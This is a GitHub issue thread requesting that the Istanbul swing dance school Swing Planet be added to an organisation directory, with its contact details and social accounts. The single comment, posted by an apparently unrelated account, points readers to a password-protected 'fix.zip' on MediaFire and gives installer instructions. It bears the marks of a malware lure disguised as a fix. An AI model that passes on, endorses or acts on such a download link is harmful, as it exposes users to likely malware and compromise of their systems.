### ISSUE TITLE
[tr] Swing Planet

### ISSUE THREAD

**Issue by Kjuly** [swingdance/orgs#50]
### Region Code

tr

### Name

Swing Planet

### City

Istanbul

### Province or State

Istanbul

### Specific Dance Style

ANY

### Email

info@swingplanet.com.tr

### Website or Homepage

https://www.swingplanet.com.tr

### Facebook

swingplanet

### Instagram

swing.planet

### YouTube

@SwingPlanet

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
